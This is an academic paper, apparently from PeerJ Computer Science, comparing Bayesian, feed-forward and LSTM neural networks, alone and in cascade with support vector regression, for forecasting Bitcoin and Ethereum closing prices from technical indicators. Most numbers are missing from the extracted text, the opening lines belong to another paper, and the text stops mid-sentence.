author contributions: martin sarnovsky conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. michal kolarik conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.

data availability: the following information was supplied regarding data availability: the source code of the model is available at github: https://github.com/miso-k/ddcw.
predictions of bitcoin prices through machine learning based frameworks

luisanna cocco, roberto tonelli and michele marchesi
department of mathematics and computer science, university of cagliari, cagliari, italy

abstract

the high volatility of an asset in financial markets is commonly seen as a negative factor. however, short-term trades may entail high profits if traders open and close the correct positions. the high volatility of cryptocurrencies, and in particular of bitcoin, is what made cryptocurrency trading so profitable in these last years. the main goal of this work is to compare several frameworks with each other to predict the daily closing bitcoin price, investigating those that provide the best performance, after a rigorous model selection by the so-called k-fold cross-validation method. we evaluated the performance of one-stage frameworks, based only on one machine learning technique, such as the bayesian neural network, the feed forward and the long short term memory neural networks, and that of two-stages frameworks formed by the neural networks just mentioned in cascade to support vector regression. the results highlight higher performance of the two-stages frameworks with respect to the corresponding one-stage frameworks, except for the bayesian neural network. the one-stage framework based on the bayesian neural network has the highest performance, and the order of magnitude of the mean absolute percentage error computed on the price predicted by this framework is in agreement with those reported in recent literature works.

subjects artificial intelligence, data mining and machine learning
keywords machine learning, cryptocurrencies, technical indicators, bayesian neural network

how to cite this article: cocco l, tonelli r, marchesi m. predictions of bitcoin prices through machine learning based frameworks. peerj comput. sci., doi . /peerj-cs. submitted september , accepted february , published march . corresponding author: luisanna cocco, cocco@unica.it. academic editor: ana reyes-menendez. copyright cocco et al., distributed under creative commons cc-by.

introduction

unlike the volatility of traditional market assets, the volatility of cryptocurrency markets is very high, and albeit they share some characteristics of traditional stock markets, they are highly unstable. indeed, these markets are decentralized and unregulated, and also subject to manipulation. nowadays many entrepreneurs invest in blockchain, the well known technology underlying the most popular cryptocurrencies including bitcoin, and we can expect that this number will grow as the bitcoin utility increases; and many people speculate on the bitcoin price. speculating on the bitcoin market may offer the opportunity to obtain substantial returns, but it may also entail a very high risk. so judging the best time to enter the market is extremely important in order to get profits and not to lose too much money. the price of bitcoin changes every day, just like the price of fiat currencies. however, the bitcoin price changes are on a greater scale than the fiat currency changes. as a result, getting an idea of the future price trend can be extremely important. to date, several on-line platforms make available technical analysis tools that allow the bitcoin
speculators to identify trends and market sentiment; the number of research papers that investigate the future bitcoin price trend is increasing. figures and show the usd/eur and btc/usd currency pairs and their volatility. as a measure of volatility we used the moving standard deviation, calculated by applying the pandas rolling standard deviation to the logarithmic returns of each of the just quoted currency pairs using a window of days. we also computed the maximum and minimum value of the usd/eur and btc/usd currency pairs' volatility. the maximum value of the btc/usd volatility is equal to . , whereas the minimum value is equal to . . for usd/eur the maximum value is one order of magnitude lower: it is equal to . , whereas the minimum value is equal to . . in this article we propose and study some machine learning based frameworks to forecast bitcoin prices. these frameworks could be used to decide when and how much to invest, and also to build bitcoin trading strategies. the main goal of this work is to analyze the performance of bayesian neural networks (bnn) in predicting the bitcoin prices, and to compare them with those obtained using other kinds of nns, such as the feed forward neural network (ffnn) and the long short term memory neural network (lstmnn). in addition, following the approach proposed in the work by patel et al. ( ), we analyzed whether the performance of the ffnn and lstmnn increases when putting each of them in cascade to another ml technique, the so-called support vector regression (svr).

figure (a) time trend of usd/eur currency pair and (b) its volatility.

let us define, as in the work by patel et al. ( ), the first models just described, bnn, ffnn and lstmnn, as single stage frameworks, and the others, svr+ffnn and svr+lstmnn, as two stages frameworks. the former predict the bitcoin price by a single ml technique, the latter instead predict the bitcoin price by two ml techniques in cascade. all frameworks attempt to predict the bitcoin prices starting from five technical indicators: the simple moving average (sma), the exponential moving average (ema), the momentum (mom), the moving average convergence divergence (macd) and the relative strength index (rsi). hence, starting from the value of these five technical indicators at the tth day, the one-stage framework aims to predict the daily closing bitcoin price at the (t + n)th day, with n = , n = and n = (see fig. ). instead, in the two stages frameworks the first stage, formed by an svr, receives in input the five technical indicators at the tth day and predicts the value of the five technical indicators at the (t + n)th day; the second stage, formed by one of the two nns, receives in input the five technical indicators at the (t + n)th day and predicts the daily closing price of bitcoin at the (t + n)th day, as in the work by patel et al. ( ) (see fig. ). to evaluate the performance of our proposed frameworks, at first we divided the whole data set into train and test sets, with the test set equal to % of the whole data set.
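the rolling volatility measure described above is straightforward to reproduce with pandas; the snippet below is a minimal sketch under the assumption of a daily closing-price series, with an illustrative 30-day window (the window length used in the paper is not reproduced here).

```python
import numpy as np
import pandas as pd

def rolling_volatility(close: pd.Series, window: int = 30) -> pd.Series:
    """Moving standard deviation of the logarithmic returns of a price series."""
    log_returns = np.log(close).diff()
    return log_returns.rolling(window).std()

# hypothetical usage with a csv containing 'date' and 'close' columns
# prices = pd.read_csv("btc_usd.csv", parse_dates=["date"], index_col="date")
# vol = rolling_volatility(prices["close"])
# print(vol.max(), vol.min())
```

the maximum and minimum of the resulting series are the volatility extremes quoted above for the btc/usd and usd/eur pairs.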
then, in order to select the best neural network architectures, we calibrated these frameworks by applying the k-fold cross-validation method to the train set just mentioned.

figure (a) time trend of btc/usd currency pair and (b) its volatility.

we selected the best architecture for the anns and the best architecture for the bnns. once the best architectures were selected, by analyzing the average across the k folds of the mean absolute percentage error (mape) for each architecture, we trained the best selected architectures on the whole data set. the final results provide a robust estimation of the performance of these architectures, since they are the mape's average (std) across the several monte carlo runs performed. let us underline that a peculiarity of our work is tuning the architectures' hyper-parameters by the k-fold cross-validation method, and predicting prices in a young, unstable and immature market such as the cryptocurrency market, providing robust results thanks to the monte carlo method applied. note that we predicted the bitcoin prices and also the ethereum prices applying in both cases the same methodologies. in this first work, due to the computational complexity of some proposed frameworks, an exhaustive optimization was not performed. nevertheless, the bitcoin price predictions are comparable with those found in the literature, and the proposed frameworks perform well also when applied to the ethereum price prediction. the article is organized as follows. the related work section describes related work; the proposed framework section presents the frameworks proposed in our work for the prediction of the bitcoin price, describing the ml techniques used and their inputs, that are the technical indicators mentioned above, built starting from the daily closing bitcoin price series; the framework's calibration and performance metric section illustrates the calibration of the proposed frameworks, the training and testing data sets, and the performance metrics with which the proposed frameworks are evaluated; the results section presents the results, and finally, the conclusions section concludes and discusses future works.

figure architecture of the one stage framework.

as in all supervised learning problems, in our problem there are input patterns (x) and output patterns (y), and given the input patterns an algorithm learns how to predict the output patterns. we transformed our time series data into a supervised learning problem using the shift() function of the well known python data analysis library, pandas. starting from our input time series, we created copies of columns of lag observations as well as columns of forecast observations, using as inputs those from the tth day to the (t + n − 1)th day, thus transforming a time series dataset into a supervised learning format (see brownlee ( a, b) for a detailed description and implementation in python).
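the shift()-based transformation described above can be sketched as follows; this is an illustrative reimplementation rather than the authors' code, assuming a dataframe of daily technical indicators, a series of closing prices, and an arbitrarily chosen horizon n.

```python
import pandas as pd

def to_supervised(indicators: pd.DataFrame, close: pd.Series, n: int = 1) -> pd.DataFrame:
    """Pair the indicator values at day t with the closing price at day t + n."""
    frame = indicators.copy()
    # shift(-n) moves future values backwards, so row t holds the price of day t + n
    frame["target_close"] = close.shift(-n)
    return frame.dropna()  # the last n rows have no future price and are dropped

# hypothetical usage (horizon chosen arbitrarily for illustration):
# data = pd.DataFrame({"sma": sma, "ema": ema, "mom": mom, "macd": macd, "rsi": rsi})
# supervised = to_supervised(data, close, n=7)
# X, y = supervised.drop(columns="target_close"), supervised["target_close"]
```

splitting the resulting x and y chronologically into train and test portions then reproduces the supervised-learning setting used by all the frameworks discussed in this paper.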
figure architecture of the two stages framework.

related work

in this work, as already mentioned, the proposed frameworks, and in particular the idea of the one- and two-stages approach, stem from the work by patel et al. ( ). in that work, the authors predict the future values of two indian stock market indices, cnx nifty and s&p bombay stock exchange (bse) sensex, by the svr combined with artificial neural network (ann) and random forest (rf) algorithms. they compare the results obtained with these two stages frameworks with those obtained with the single stage frameworks, each formed by a single ml technique, ann, rf or svr. contrary to the work by patel et al. ( ), in our work we also investigated the performance of the bnn. bnns are taken into account in the work by jang & lee ( ), who use blockchain information in order to predict the log price and the log volatility of the bitcoin price. in that work, the authors select the relevant inputs by studying the multicollinearity problem, and specifically by studying the variance inflation factor (vif) value of each input. also in the work by mallqui & fernandes ( ) the authors select the relevant inputs for their prediction problem, but the selection of the relevant inputs is done using correlation analysis, the relief technique, the information gain method, principal component analysis, and correlation-based feature subset selection. in the work by mallqui & fernandes ( ) the authors predict both the bitcoin price and its movements, hence they solve both a classification problem and a regression problem by different ml algorithms: a recurrent neural network, a tree classifier and the svm algorithm. owing to the low number of inputs taken into account in our work, we did not apply any selection method. we simply evaluated the performance of the proposed frameworks while varying the number of inputs taken into account, finding that the best performance of the bnn is obtained taking into account all five technical indicators. our future work is to investigate the performance of the proposed frameworks under the assumption of a higher number of inputs, which includes also blockchain information, tweet volumes and sentiment analysis. twitter data and google trends data are used by abraham et al. ( ) in order to predict changes in the prices of both bitcoin and ethereum. in that work, the authors predict the direction of price changes by a linear model. in the work by huang, huang & ni ( ) the authors investigated cryptocurrency return predictability, specifically the bitcoin return predictability. they forecast the bitcoin daily return using a tree-based predictive model and technical indicators as input. results showed that their predictive model has strong predictive power and performance higher than those obtained by a buy-and-hold strategy. as a result, the work by huang, huang & ni ( ) suggests that technical analysis can be useful in the bitcoin market. a similar result is obtained in the work by cocco, tonelli & marchesi ( ), who simulate the trading of the currency pair btc/usd. they simulate a btc/usd artificial market in which chartists (speculators) trade through the application of trading rules based on technical indicators, and random traders trade without applying any specific trading strategy. results show that chartists, who adopt the trading rules selected by a genetic algorithm that optimizes their parameters, are able to achieve higher profits. let us quote other relevant works.
shintate & pichl ( ), ji, kim & im ( ), livieris et al. ( ), lamothe-fernández et al. ( ), and chen, li & sun ( ) predicted bitcoin price at different frequencies using several machine learning techniques and investigating the importance of the sample dimension. greaves & au ( ) investigated the predictive power of blockchain network-based features on the bitcoin price. they found a low predictive power embedded in these network features probably because bitcoin price is technically dictated by exchanges’ behaviors. akcora et al. ( ) introduced the concept of k-chainlets expanding the concepts of motifs and graphlets to blockchain graphs. they found that certain types of chainlets have a high predictive power for bitcoin prices. lahmiri & bekiros ( ) implemented deep learning techniques to forecast the price of the three cryptocurrencies, bitcoin, digital cash and ripple, finding that these three digital currencies exhibit fractal dynamics, long memory and self- similarity. indera et al. ( ) presented a multi-layer perceptron-based non-linear autoregressive with exogeneous inputs (narx) model to predict bitcoin price starting from the opening, closing, minimum, maximum past prices and a technical indicator, the cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well-known moving average. munim, shakil & alon ( ) forecasted bitcoin price using the autoregressive integrated moving average (arima) and neural network autoregression (nnar) models. uras et al. ( ) segmented each analyzed financial time series into short partially overlapping sequences in such a way that these sequences do not resemble a random walk. the authors identified a train and a test set within each time regime/sequence. then, in each identified sequence they applied different forecasting procedures—simple linear regression, multiple linear regression, multilayer perceptron and the long short-term memory. mudassir et al. ( ) presented high-performance machine learning-based classification and regression models for predicting bitcoin price movements and prices in short and medium terms. among the machine learning techniques used by the authors there is the stacked ann (sann), constituted of ann models that are used to train a larger ann. the sann was trained using the training dataset and the -fold cross-validation, by training each of ann models on a separate fold. the final larger ann learns from these five models, that is, it trains on the outputs of the five individual smaller anns. all the cited works focus on end-of-day closing price forecast and/or price movements forecasting for the next day prices, but the work by patel et al. ( ) and the last work quoted, that by mudassir et al. ( ). the former focuses on forecasts for – , and days in advance, instead the latter focuses on end-of day, short-term ( days) and mid-term ( and days) forecasts. in this work we focus on end-of day, short-term ( days) and mid-term ( days) forecasts. finally, we quote the works by jang et al. ( ), chih-hung, yu-feng & chih-hung ( ), pant et al. ( ), mcnally, roche & caton ( ), phaladisailoed & numnonda ( ), roy, nanjiba & chakrabarty ( ), and by velankar, valecha & maji ( ) that are published in the proceedings of recent international conferences and deal with the prediction of the bitcoin price using machine learning techniques. 
to the best of our knowledge, our work is the first attempt of predicting the bitcoin price investigating the best architecture by the so called k-fold cross-validation method, applying it only to a part of the whole dataset, as described in details in section framework’s calibration and performance metric. in modern applied machine learning in order to tune model hyper parameters the definition of the k-fold cross-validation method often replaces the definitions of training, validation and test data set for preventing overfitting. in their book kuhn & johnson ( ) wrote: …we must use the existing data to identify settings for the model’s parameters that yield the best and most realistic predictive performance (known as model tuning). traditionally, this has been achieved by splitting the existing data into training and test sets. the training set is used to build and tune the model and the test set is used to estimate the model’s predictive performance. modern approaches to model building split the data into multiple training and testing sets, which have been shown to often find more optimal tuning parameters and give a more accurate representation of the model’s predictive performance. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this is because using a sole test set or a validation set has many limitations, as discussed by kuhn & johnson ( ), brownlee ( c), anguita et al. ( ), and rodriguez, perez & lozano ( ). it is worth underlining that every machine learning model always has some error because it is a model. kuhn & johnson ( ) wrote: many modern classification and regression models are highly adaptable; they are capable of modeling complex relationships. however, they can very easily overemphasize patterns that are not reproducible. without a methodological approach to evaluating models, the modeler will not know about the problem until the next set of samples are predicted. in statistics a common aphorism, that is generally attributed to the statistician george box, goes all models are wrong and is often expanded as all models are wrong but some are useful. this aphorism applies also to the choice and preparation of data, choice of hyperparameters, and the interpretation of model predictions. in this work we attempted of predicting the bitcoin price investigating the best architecture by the k-fold cross-validation method, and using the monte carlo method to handle the stochastic nature of the neural networks, hence providing statistics to summarize the performance of the best selected models. this approach is not always applicable due to the long training times of some models. the monte carlo method as well as all methods and tools from probability provide a way to handle the random nature of the predictive modeling problems. note that, as we are going to describe in next sections, our results are comparable with those in literature despite the proposed frameworks are relatively simple in comparison to those proposed previously in literature. there are works that propose a framework using a high number of inputs, deep neural networks (dnn), convolutional neural networks (cnn) and complex stacking ensemble models (see for example the ensemble model proposed by ji, kim & im ( ), in which the first level consists dnn, lstm, and cnn, and the second level consists of a single dnn model). 
proposed frameworks

in this work we compare the performance of the single stage frameworks, formed by an nn (bnn, ffnn, or lstmnn), with the performance of the two stages frameworks, formed by an nn in cascade to an svr. all frameworks aim to predict the daily closing bitcoin and ethereum price at the (t + n)th day, with n = , n = , and n = , starting from the value of five technical indicators, sma, ema, mom, rsi and macd, at the tth day. in the following we briefly describe the technical indicators and the ml techniques adopted in this work.

technical indicators

the five indicators mentioned above are well known in technical analysis (kirkpatrick & dahlquist, ), which forecasts the movements of financial assets' prices through the study of past market data, such as price and volume. they are mathematical constructions used to process data, for example on the price trend and on the volumes traded of a financial security, in order to predict its future price performance and get buy and sell signals (for more details see http://mrjbq .github.io/ta-lib/funcs.html, which explains the functions of the ta-lib library used to compute these technical indicators).

moving averages

moving averages, sma and ema, are basic indicators for determining price trends. they are defined as follows:

sma_t = (1/n) Σ_{i=0}^{n−1} p_{t−i} ( )

and

ema_t = ema_{t−1} + [2/(n + 1)] (p_t − ema_{t−1}) ( )

where p is the price and n is the used period. both are calculated by averaging a certain number of past data. the main difference is that in the ema the data are weighted, and old data have less weight than recent data (the ema value at t is based on the previous ema value at t − 1; the initial ema value is an sma computed over a period equal to that used in the ema). owing to the high volatility of the bitcoin price, we dealt with short term moving averages, which usually take into account periods between and days. in this work we considered moving averages on periods equal to days.

oscillators

contrary to the moving averages, macd, rsi and mom are called oscillators because their value oscillates in a sinusoidal manner between a minimum and a maximum. they can be useful for identifying points of excessive price increase or excessive price decrease, and points of possible change in the direction of prices.

macd considers the difference between the values of two moving averages (macd line), one a short period ema and the other a long period ema, together with an exponential moving average of this difference (signal line) and a histogram given by the distance between the macd line and the signal line. it is defined as follows:

shortema_t = α_s p_t + (1 − α_s) shortema_{t−1} ( )

longema_t = α_l p_t + (1 − α_l) longema_{t−1} ( )

and

macd_t = shortema_t − longema_t ( )

where α_s and α_l are the smoothing factors of the short period and long period emas. the and -day averages usually determine the macd line, while the -day average determines the signal line. in this work we considered these values to compute the macd.

rsi is a technical indicator of momentum useful for identifying the oversold and overbought phases of an asset. it is defined as follows:

rsi_t = 100 · upavg_t / (upavg_t + dnavg_t) ( )

where

upavg_t = [upavg_{t−1} · (n − 1) + up_t] / n
dnavg_t = [dnavg_{t−1} · (n − 1) + dn_t] / n

and n is the period used to compute this indicator, up_t = p_t − p_{t−1} and dn_t = 0 if p_t > p_{t−1}, otherwise up_t = 0 and dn_t = p_{t−1} − p_t.

areas of overbought indicate a time when prices go too far above their average of the period, and given that the price is now too high we can expect an imminent return of prices downwards (sell signal). areas of oversold indicate a time when prices have pushed too low compared to their average and therefore we expect an imminent bullish return movement towards their average (buy signal). rsi values range from to . over points there is an overbought signal, and under an oversold signal.

mom measures the rate of change of any instrument. it compares the current price with the price of some previous periods:

mom_t = p_t − p_{t−n} ( )

in this work we set the period used by this oscillator equal to days.
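for concreteness, the five indicators defined above can be computed in a few lines of pandas. the sketch below is illustrative rather than the authors' code: the function names are ours, the macd periods passed as defaults (12 and 26 days) are only the common textbook choice and not taken from this work, and the ta-lib library referenced above could equally be used.

import pandas as pd

def sma(prices: pd.Series, n: int) -> pd.Series:
    # simple moving average over the last n closing prices
    return prices.rolling(window=n).mean()

def ema(prices: pd.Series, n: int) -> pd.Series:
    # exponential moving average with smoothing factor 2/(n + 1); note pandas
    # seeds the recursion with the first price, while the text seeds it with
    # an sma over the first n prices
    return prices.ewm(span=n, adjust=False).mean()

def macd(prices: pd.Series, n_short: int = 12, n_long: int = 26) -> pd.Series:
    # macd line = short period ema minus long period ema (periods are assumptions)
    return ema(prices, n_short) - ema(prices, n_long)

def rsi(prices: pd.Series, n: int) -> pd.Series:
    # rsi from the recursive up/down averages defined above; the recursion
    # upavg_t = (upavg_{t-1}*(n-1) + up_t)/n is an ewm with alpha = 1/n
    delta = prices.diff()
    up_avg = delta.clip(lower=0.0).ewm(alpha=1.0 / n, adjust=False).mean()
    dn_avg = (-delta).clip(lower=0.0).ewm(alpha=1.0 / n, adjust=False).mean()
    return 100.0 * up_avg / (up_avg + dn_avg)

def mom(prices: pd.Series, n: int) -> pd.Series:
    # momentum: current price minus the price n days earlier
    return prices - prices.shift(n)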
machine learning techniques

all the ml techniques adopted in this work operate in a supervised context. the training takes place by presenting to the network inputs (the training dataset) whose output is known, hence by presenting to the network the data set (x_n, y_n), where each data point in input x_n ∈ R^d, whereas the output y_n ∈ R.

bayesian neural network

contrary to other types of neural networks, such as the ff and the lstm, which find a weight array that maximizes the fitting of the nn outputs with respect to the training outputs, following the principle of maximum likelihood, the bnns follow the bayesian approach. in the maximum likelihood approach, the learning aims at finding a single network—"the best"—the one that makes the smallest error on the training data. as a result, at the end of the training we get a single weight array. on the contrary, the bayesian approach considers a probability distribution for the weights. at the end of the training we have more than one network and the output is computed as the expected value of the outputs generated by all these networks. in deeper detail, in a bnn the weights and the outputs are assumed to be sampled from a distribution.

let us define the bnn taken into account in this work. it has an input with d dimensions and two hidden layers, whose dimensions are hl_1 and hl_2, respectively. for such a network the parameters θ = {v_0, v_1, v_2, b_0, b_1, b_2} are defined as follows:

v_0 ∈ R^(d × hl_1), v_1 ∈ R^(hl_1 × hl_2), v_2 ∈ R^(hl_2 × 1), b_0 ∈ R^(hl_1), b_1 ∈ R^(hl_2), and b_2 ∈ R

the activation functions that allow passing from one layer to another are rectified linear unit activations, hence our nn is defined as follows:

nn: R^d → R^(hl_1) → R^(hl_2) → R

and a data point in input x passes through the following layers:

x → h_1 = max(0, v_0^T x + b_0) → h_2 = max(0, v_1^T h_1 + b_1) → v_2^T h_2 + b_2

the prior distribution on the weights is defined as a standard normal distribution, as follows:

p(θ) = normal(θ | 0, I)

(where 0 is a zero matrix and I is an identity matrix), and the likelihood for each data point (x, y) is given by:

p(y | x, θ) = p(D | θ) = normal(y | nn(x; θ), σ_y²)

where D denotes the training dataset, hence it represents all the data points presented to the network during the training, and σ_y² is a fixed variance. given the prior and the likelihood, the posterior distribution p(θ | D) is approximated by a parametrized family q(θ; λ) through a variational inference method minimizing the kullback–leibler divergence between the two distributions q and p.
note that the data are scaled to be centered and have unit variance. once the posterior distribution, that is the distribution of the weights θ of the bnn, has been estimated, we can compute the posterior predictive distribution for testing data points in input x_test. this distribution is given by:

p(y | x_test, D) = ∫ normal(y | nn(x_test; θ), σ_y²) p(θ | D) dθ

it can be computed using the monte carlo approximation:

p(y | x_test, D) ≈ (1/n_samples) Σ_{i=1}^{n_samples} normal(y | nn(x_test; θ_i), σ_y²)

we sampled from the posterior, that is from the distribution q(θ; λ*). this implies sampling the weights θ, which gives nn(x_test, θ_i) with i = 1, ..., m, where m is the number of extracted samples. m values of nn(x_test, θ_i), that is m values of y, are associated to each data point x_test belonging to the testing dataset. since to each x_test in input only one value of y must correspond in output, we have to compute the posterior predictive distribution for each x_test in the testing dataset. due to the computational complexity, we grouped all the sample predictions into histograms, forming the posterior predictive distribution as a mixture distribution according to these histograms (a mixture distribution is the probability distribution of a random variable that is derived from a collection of other random variables as follows: first, a random variable is selected by chance from the collection according to given probabilities of selection, and then the value of the desired random variable is obtained; see http://edwardlib.org/api/ed/models/mixture). we computed the prices' prediction by sampling from this mixture and computing the mean. (for implementation details see http://edwardlib.org/tutorials/bayesian-neural-network and https://github.com/mikkokemppainen/jupyter_notebooks/blob/master/edward_notebook_public.ipynb; for the variational inference method see http://edwardlib.org/tutorials/klqp.)

feed forward and long short term memory neural network

as regards the other two neural networks taken into account in this work, the ffnn and the lstmnn, the main difference between them is that the former is composed of a series of layers of neurons connected without cycles, whereas the latter is characterized by the presence of cycles and is able to consider long-term dependencies among data.

specifically, we implemented an ffnn composed of layers: an input layer, a hidden layer and an output layer, as in the work by patel et al. ( ). the input layer takes in input the five technical indicators, and the output layer predicts the price at the (t + n)th day. we initialized the network's weights to random numbers generated from a uniform distribution, used a tangent sigmoid as activation function in the first two layers, and a linear activation function in the output layer, as in the work by patel et al. ( ). the output layer of the neural network has only one neuron, and the value it returns is compared with the true value.

we implemented an lstmnn having a visible layer with the five technical indicators in input, a hidden layer with nn neurons, also called lstm blocks, and an output layer that predicts the price at the (t + n)th day. the default sigmoid activation function is used for the lstm blocks. we trained both networks for ne epochs, used a batch size of nb, and adam as the optimization algorithm to update the network weights (kingma & adam, ).
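as a rough illustration of the ffnn and the lstmnn just described, the keras sketch below builds the two single stage predictors. it is only a sketch under our own assumptions, not the authors' implementation: the constants n_neurons, n_epochs and n_batch stand in for the tuned values nn, ne and nb selected later by cross-validation, and the single tanh hidden layer is one reading of the three layer architecture described above.

from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM

N_FEATURES = 5                                 # the five technical indicators at day t
N_NEURONS, N_EPOCHS, N_BATCH = 10, 100, 16     # placeholders for nn, ne, nb

def build_ffnn():
    # input -> tanh hidden layer -> single linear output neuron
    model = Sequential([
        Dense(N_NEURONS, activation="tanh", input_shape=(N_FEATURES,)),
        Dense(1, activation="linear"),
    ])
    model.compile(optimizer="adam", loss="mae")
    return model

def build_lstmnn():
    # lstm blocks over a single time step holding the five indicators
    model = Sequential([
        LSTM(N_NEURONS, input_shape=(1, N_FEATURES)),
        Dense(1, activation="linear"),
    ])
    model.compile(optimizer="adam", loss="mae")
    return model

# x: array of shape (n_days, 5) with the indicators at day t; y: price at day t + n
# build_ffnn().fit(x, y, epochs=N_EPOCHS, batch_size=N_BATCH)
# build_lstmnn().fit(x.reshape(-1, 1, N_FEATURES), y, epochs=N_EPOCHS, batch_size=N_BATCH)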
the adam algorithm is based on gradient descent, which minimizes an objective function, in our case the mean absolute error (mae) of the output produced by the nns with respect to the desired output.

support vector regression

let us conclude this brief overview with the ml technique used in the two stages frameworks, the svr. it belongs to a set of supervised learning methods that can be used both for classification and for regression. in a classification problem this technique is called support vector machine (svm). for instance, it can be used to divide the set of training data into two classes; an svm is able to identify the hyperplane having the maximum margin of separation between the two classes. to this purpose, the training data set is mapped into a space called feature space using non-linear functions, ψ, called feature functions, which are a combination of the so called kernel functions. they map lower dimensional data into higher dimensional data. in a regression problem, svr tries to keep the fitting error within a certain threshold. indeed, the goal of this ml technique is to find a function ψ that deviates from the observed value by a value no greater than ε for each training point.

the kernel functions most used, and adopted also in this work, are the following:
- linear: k(x_i, x_j) = x_i^T x_j
- polynomial: k(x_i, x_j) = (γ x_i^T x_j + r)^d, where d is the degree of the polynomial function
- radial basis function: k(x_i, x_j) = exp(−γ ||x_i − x_j||²), with γ > 0

frameworks' calibration and performance metric

we analyzed the time series of bitcoin and ethereum daily closing prices. specifically, the dataset taken into account includes daily closing price values from january st, to april th, , for a total of , values. starting from these series we computed the time series of the five technical indicators, which are the inputs of our frameworks and the features x_n of the dataset (x_n, y_n), including the training and testing datasets. the bitcoin daily price time series defines the output y_n of such a dataset. summary statistics for the five inputs and the output are described in table for the bitcoin and ethereum price time series.

to evaluate the performance of the proposed single stage and two stages frameworks, we computed the mean absolute percentage error (mape), defined as follows:

mape = (100/n) Σ_{t=1}^{n} |a_t − f_t| / |a_t|

where a_t and f_t are the actual and forecast prices, respectively, at time t.

as regards the calibration of the used ml techniques, we tuned the model hyper parameters, that is the parameters whose values are set before starting the learning process, using the k-fold cross-validation method (see the works by kuhn & johnson ( ),

table summary statistics for the five inputs and the output for bitcoin and ethereum prices. max min mean standard deviation btc sma , . . , . , . ema , . . , . , . mom , . − , . , . macd , . − , . . . rsi . . . . close , . . , . , . eth sma , . . . . ema , . . . . mom . − . . .
macd . − . . . rsi . . . . close , . . . . cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ brownlee ( c), and rodriguez, perez & lozano ( )). the k-fold cross-validation method implies the creation of several neural network architectures and the training of every architecture at each k-fold. for each architecture and for each k-fold the mape value is computed. the average of the mape’s k values across the k-folds for a given architecture represents the performance of that architecture. the architecture with the lowest average is the best. it represents the model that has to be trained on all data. the k-fold cross-validation method works as described by the following pseudo-code: start: #split data into training and testing dataset traindata, testdata = split(alldata) #tune parameters of the model parameters = … k = … archskills = list() for p in parameters do k-fold_skills = list() for i in do k-fold _train, k-fold_val = split(i, k, traindata) model = fit (k-fold-train, p) skill_estimate = evaluate(model, k-fold_val) end for # for each k-fold calculate mape and store the average skill = summarize(k-fold_skills) archskills.append(skill) end for #evaluate the model with the best tuning with all data model = fit(traindata) skill = evaluate(model, testdata) end. we applied the k-fold cross-validation method with k = – % of the whole dataset. we used the k-fold method with an expanding window, hence we divided the data set in three folds/splits as illustrated in fig. . as underlined by kuhn & johnson ( ) a formal rule to choose the value of k does not exist. since our data set size is not large enough three should be an acceptable value for k. we repeated the k-fold cross-validation method several times, choosing at the end the tuning that provides the architecture having the best performance. as regards the hyper parameters of the bnn, one, two, and three hidden layers, nhl, were tested, with combinations of , , , , and neurons, nn. as regards the hyper parameters of the other ml techniques adopted (ffnn, lstmnn and svr), they were selected running sixty monte carlo runs, and taking in each run a different constellation. the hyper parameters that must be selected, are the number of epochs, ne, the number of neurons, nn, the number of batches, nb, the degree of the polynomial kernel, d, the value of γ (that is a parameter of the radial basis kernel). for each of them we tested the k-fold method with both an expanding window and a sliding window, and at the end we chose an expanding window given that with it we obtained the best results. cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we defined the range in which they vary, as follows : ne ∈ [ , ], nn ∈ [ , ], nb ∈ [ , ], d ∈ [ , ], γ ∈ [ . , ]. once the best architecture is selected, we train it with all data, considering the testing set equal to % of the whole data set, that is the part of the data set not used in the k-fold method. to evaluate the robustness of the selected architecture’s performance we repeated this procedure forty times, applying the so called monte carlo method. the performance of each proposed framework are measured by the average and the standard deviation of the mape’s values across the monte carlo runs , . 
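the expanding window cross-validation just described can be sketched with sklearn's timeseriessplit, which grows the training window fold by fold and validates on the next block while respecting the temporal order of the series. this is an illustrative sketch rather than the authors' code: build_model stands for any of the frameworks above, and the mape helper implements the metric defined earlier.

import numpy as np
from sklearn.model_selection import TimeSeriesSplit

def mape(actual, forecast):
    # mean absolute percentage error, as defined in the previous section
    actual, forecast = np.asarray(actual), np.asarray(forecast)
    return 100.0 * np.mean(np.abs(actual - forecast) / np.abs(actual))

def expanding_window_cv(x, y, build_model, n_splits=3):
    """average and spread of the mape over k expanding-window folds for one
    hyper parameter constellation; the lowest average identifies the best
    architecture, which is then retrained on the whole training set."""
    scores = []
    for train_idx, val_idx in TimeSeriesSplit(n_splits=n_splits).split(x):
        model = build_model()                      # fresh, unfitted model
        model.fit(x[train_idx], y[train_idx])
        scores.append(mape(y[val_idx], model.predict(x[val_idx])))
    return float(np.mean(scores)), float(np.std(scores))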
results as just described, to tune our frameworks we applied the k-fold cross-validation method to % of the whole data set, using k = , an expanding window, and respecting the temporal order of the series. for each defined architecture, we applied this method computing the prediction at (t + n)th day ahead of time, with n = and the mape’s values for each fold. the k-fold cross-validation method was run once for each different constellation of the main parameters of each framework, since our goal is to select the best model/architecture for ann and the best model for bnn, in order to compare the performance of these two kind of nns. table reports the measure of the best performance for each proposed framework, and their hyper parameters, ne, nn, nb, γ, d, and nhl. precisely for all frameworks under study, the average and the standard deviation (values in brackets) of the mape’s values across the k-folds are described. the analysis performed highlighted the following patterns (see table ). firstly, the two stages frameworks perform better than the correspondent one stage frameworks, but for the bnn and svr(r)+lstmnn. secondly, the ann’s performance is higher than those of bnn. thirdly, the two stages frameworks composed of svr, using a linear kernel function performs better than other two kinds of kernels. for ann the best architecture selected corresponds to a two stages framework, composed of svr + lstmnn, in which the svr uses a linear kernel function and the lstmnn uses for training ne = , nn = , and nb = . for this framework we obtained the lowest average of the mape’s values across the k-folds. this average value is equal to . (std. . ). figure the figure shows as % of the whole data set is divided into -folds/splits, and as the expanding window approach, used to cross validation, works. full-size doi: . /peerj-cs. /fig- note that all the parameters not men- tioned here are defined as described in section proposed frameworks or, given that we used the well known python libraries, sklearn and 